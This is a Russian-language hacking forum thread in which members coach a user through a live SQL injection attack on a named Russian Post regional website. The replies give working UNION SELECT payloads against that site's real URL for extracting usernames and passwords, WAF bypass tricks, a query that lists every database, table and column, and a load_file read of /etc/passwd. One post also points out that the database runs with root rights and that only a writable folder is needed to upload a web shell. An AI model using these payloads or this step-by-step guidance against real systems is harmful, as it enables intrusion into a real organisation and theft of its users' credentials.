10.03.2015, 00:21
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю
id=-561'+union+select+1,User,Password,4,5,6,7+FROM+use r+--+
ничего не выводить. Помогите, как зделать?
|
|
|
10.03.2015, 00:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от teh
Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю
id=-561'+union+select+1,User,Password,4,5,6,7+FROM+use r+--+
ничего не выводить. Помогите, как зделать?
захексить или зачарить, или добавить лимит, или заюзать что-то типа:
INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble _Name)
MAKE_SET(1|2,@@version,USER())
EXPORT_SET(1,user(),version(),',',2)
LPAD('Chat','8','Anti')
или обойти WAF,например, если
403: Access Forbidden
Обходится элементарно с помощью "(" и ")", /**/, %0А, %0d, %09, %20 и т.д., или
Sucuri WebSite Firewall - CloudProxy - Access Denied
Обходится так: union/*123*/select
и т.д.
Короче, вобщем смотря по ситуации что там.
|
|
|
|
10.03.2015, 01:07
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
С нами:
7680566
Репутация:
1
|
|
или поля пустые
|
|
|
|
10.03.2015, 10:17
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от teh
Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю
id=-561'+union+select+1,User,Password,4,5,6,7+FROM+use r+--+
ничего не выводить. Помогите, как зделать?
Может быть кодировка.
concat_ws(0x3a,convert(user%20using%20utf8),conver t(password%20using%20utf8))
|
|
|
|
10.03.2015, 16:06
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Вот скуля
www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+news--
ничего не выводит, что тут делать?
|
|
|
|
10.03.2015, 16:15
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от teh
Вот скуля
www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+news--
ничего не выводит, что тут делать?
Дело в том, что надо указывать бд
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+konkurs.news--
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ftpuse rs.users--
а вообще
root
mq off
|
|
|
|
10.03.2015, 17:11
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
узнал бд. называется ufps. и подставляю, получается
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ufps.u sers--
все равно ошибка, пожалуйста подскажите, что такое?
|
|
|
|
10.03.2015, 17:49
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от teh
узнал бд. называется ufps. и подставляю, получается
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ufps.u sers--
все равно ошибка, пожалуйста подскажите, что такое?
ufps это current_table. а тебе нужна база, в которой лежит таблица users. а лежит она в базе ftpusers
|
|
|
|
10.03.2015, 19:32
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Сообщение от faza02
ufps это current_table. а тебе нужна база, в которой лежит таблица users. а лежит она в базе ftpusers
А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста
|
|
|
|
10.03.2015, 19:46
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от teh
А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),(select(@x)from(select( @x:=0x00),(select(0)from(information_schema.column s)where(table_schema!=0x696e666f726d6174696f6e5f73 6368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,column_name))))x), 4,5,6,7+--
либо почитай мануал, как узнать таблици и колонки в БД
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),table_name,4,5,6,7+from +information_schema.tables+--
права БД рутовые, кавычки не фильтруются и не слешируются:
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=%27-1%27+union+select+1,version(),load_file(%27/etc/passwd%27),4,5,6,7+from+mysql.user+--
вам остается только найти врайтабельную папку и залить шелл
P.S: 2011 УФПС Волгоградской области
- филиал ФГУП «Почта России»
Помните об ответственности ломая подобные ресурсы!!!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
